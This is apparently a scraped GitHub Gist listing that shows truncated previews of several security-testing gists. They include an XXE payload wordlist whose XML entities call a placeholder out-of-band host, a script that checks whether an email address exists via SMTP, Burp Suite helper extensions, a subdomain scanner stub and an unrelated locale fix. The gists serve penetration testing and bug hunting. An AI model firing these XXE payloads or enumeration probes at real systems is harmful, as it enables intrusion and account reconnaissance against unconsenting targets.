honoki
/ xxe-payloads.txt
Last active
July 29, 2025 07:13
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
stefanocoding
/ does_email_address_exist.py
Last active
June 8, 2019 15:01
Useful Python script to know if an email address exists, based on Inti's Medium post https://medium.com/intigriti/abusing-autoresponders-and-email-bounces-9b1995eb53c2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # Example usage: ./does_email_address_exist.py twitter.com jack | |
| import argparse | |
| from smtplib import SMTP | |
| import dns.resolver | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('hostname') | |
| parser.add_argument('user') | |
| args = parser.parse_args() |
stefanocoding
/ copy_cookie_header.py
Last active
October 18, 2019 16:25
This Burp extension adds an item to the context menu - when right-clicking in the request in Proxy or Repeater - to copy the entire "Cookie" header without having to manually select it and press Ctrl+C. It's useful for me when updating session information of tabs in the Repeater for saved projects.
stefanocoding
/ highlight_in_scope.py
Created
April 9, 2018 15:01
Burp Extension to highlight in the Proxy requests that are in scope
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IBurpExtender | |
| from burp import IProxyListener | |
| class BurpExtender(IBurpExtender, IProxyListener): | |
| def registerExtenderCallbacks(self, callbacks): | |
| self.helpers = callbacks.getHelpers() | |
| self.callbacks = callbacks | |
| callbacks.setExtensionName('Highlight in scope') | |
| callbacks.registerProxyListener(self) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage : ./scanio.sh <save file> | |
| # Example: ./scanio.sh cname_list.txt | |
| # Premium | |
| function ech() { | |
| spinner=( "|" "/" "-" "\\" ) | |
| while true; do | |
| for i in ${spinner[@]}; do | |
| echo -ne "\r[$i] $1" |
jampajeen
/ LC_CTYPE.txt
Created
November 21, 2015 13:02
Centos warning: setlocale: LC_CTYPE: cannot change locale (UTF-8): No such file or directory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| vi /etc/environment | |
| add these lines... | |
| LANG=en_US.utf-8 | |
| LC_ALL=en_US.utf-8 |